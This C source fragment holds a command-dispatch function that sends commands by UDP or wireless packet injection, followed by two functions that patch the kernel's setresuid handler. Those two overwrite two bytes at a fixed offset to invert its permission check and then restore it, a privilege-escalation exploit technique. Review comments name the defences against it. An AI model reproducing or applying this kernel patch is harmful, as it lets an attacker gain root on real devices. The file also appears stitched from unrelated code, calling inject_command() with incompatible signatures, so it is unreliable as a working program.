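/*
 * Dispatch the command string q according to target_mode.
 *
 * Every call increments the file-level counter seq_stage. Two independent
 * paths follow:
 *
 *  - UDP path (skipped when stage[0] == 'K'): a datagram socket is opened
 *    and an address is resolved: IP/PORT when target_mode is 'F' or 'B'
 *    or when seq_stage has reached 10, IP_MON/PORT_MON otherwise. The
 *    datagram itself is only sent when target_mode is 'F' or seq_stage has
 *    reached 10; in that case seq_stage is reset to 0. The payload is
 *    strlen(q) bytes of q, so q must be NUL-terminated.
 *
 *  - RFMON path (taken when target_mode != 'F' and rfmon_avail is set):
 *    q is handed to inject_command() with a fixed length of COMMAND_LEN.
 *
 * NOTE(review): the UDP path sends q exactly as received; nothing in this
 * function authenticates or encrypts the datagram. If the command channel
 * needs integrity protection it has to be applied before this call. Confirm
 * against the callers.
 * NOTE(review): the RFMON path passes COMMAND_LEN rather than strlen(q), so
 * q presumably has to point to at least COMMAND_LEN readable bytes. Verify
 * against inject_command() to rule out an over-read.
 * NOTE(review): gethostbyname() is obsolete and returns a pointer to static
 * storage; do not call query() concurrently from several threads.
 *
 * @param q            command buffer (NUL-terminated; see the notes above)
 * @param target_mode  'F', 'B', or any other value for the RFMON-only case
 */
void query(char *q, char target_mode)
{
    seq_stage++;

    if (stage[0] != 'K') {
        /* Evaluated once, before seq_stage can be reset below. */
        const int send_due = (target_mode == 'F') || (seq_stage == 10);
        const int use_primary = send_due || (target_mode == 'B');
        struct sockaddr_in server;
        struct hostent *hp;
        int resolved = 0;
        int sock;

        sock = socket(AF_INET, SOCK_DGRAM, 0);
#ifndef MANDO_ABORDO
        if (sock < 0) {
            perror("socket");
        }
#endif

        /* Zero the whole structure so that padding never carries stack data. */
        memset(&server, 0, sizeof server);
        server.sin_family = AF_INET;
        if (use_primary) {
            server.sin_port = htons(PORT);
            hp = gethostbyname(IP);
        } else {
            server.sin_port = htons(PORT_MON);
            hp = gethostbyname(IP_MON);
        }

        if (hp == NULL) {
            /* Resolution failed: report it and do NOT dereference hp. */
            printf("Unknown host");
        } else if (hp->h_addrtype == AF_INET &&
                   hp->h_length == (int)sizeof server.sin_addr) {
            /* Copy exactly one IPv4 address; never trust h_length as a size. */
            memcpy(&server.sin_addr, hp->h_addr_list[0], sizeof server.sin_addr);
            resolved = 1;
        }

        if (send_due) {
            /* The cadence counter is reset whether or not the send succeeds. */
            seq_stage = 0;
#ifndef MANDO_ABORDO
            fprintf(stdout, "\n %li \t -> %s", seq_num, q);
#endif
            if (sock >= 0 && resolved) {
                if (sendto(sock, q, strlen(q), 0,
                           (const struct sockaddr *)&server,
                           sizeof(struct sockaddr_in)) < 0) {
#ifndef MANDO_ABORDO
                    perror("sendto");
#endif
                }
            }
        }

        if (sock >= 0) {
            close(sock);
        }
    }

    if (target_mode != 'F') {
#ifndef MANDO_ABORDO
        fprintf(stdout, "\n %li RFMON->", seq_num);
#endif
        if (rfmon_avail) {
            inject_command(capture, &gcry_hd, mac, q, COMMAND_LEN, &seq_num);
        }
    }

#ifndef MANDO_ABORDO
    fflush(stdout);
#endif
}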
/*
 * Write the two bytes { 0x00, 0x1a } at sys_setresuid_address + 0x42 by way
 * of inject_command() and pass its result back to the caller.
 *
 * The function and variable names suggest this puts a `bne` encoding back at
 * that location, i.e. it undoes an earlier in-memory change to the setresuid
 * system-call handler. Presumably so; confirm against inject_command() and
 * the target build.
 *
 * NOTE(review): the approach depends on the code at that address being
 * writable at runtime. Read-only kernel text and kernel integrity monitoring
 * are the controls that stop or surface this kind of modification.
 *
 * @param sys_setresuid_address  base address supplied by the caller
 * @return whatever inject_command() returns
 */
static bool restore_sys_setresuid(unsigned long int sys_setresuid_address)
{
    enum { PATCH_OFFSET = 0x42 };
    const char original_bytes[] = { 0x00, 0x1a };
    const unsigned long int patch_site = sys_setresuid_address + PATCH_OFFSET;

    return inject_command(original_bytes, patch_site);
}
/*
 * Write the two bytes { 0x00, 0x0a } at sys_setresuid_address + 0x42 by way
 * of inject_command() and pass its result back to the caller.
 *
 * The function and variable names suggest this replaces a conditional branch
 * in the setresuid system-call handler with a `beq` encoding. Presumably that
 * inverts a check in the handler; confirm against inject_command() and the
 * target build.
 *
 * NOTE(review): the approach depends on the code at that address being
 * writable at runtime. Read-only kernel text and kernel integrity monitoring
 * are the controls that stop or surface this kind of modification.
 *
 * @param sys_setresuid_address  base address supplied by the caller
 * @return whatever inject_command() returns
 */
static bool break_sys_setresuid(unsigned long int sys_setresuid_address)
{
    enum { PATCH_OFFSET = 0x42 };
    const char replacement_bytes[] = { 0x00, 0x0a };
    const unsigned long int patch_site = sys_setresuid_address + PATCH_OFFSET;

    return inject_command(replacement_bytes, patch_site);
}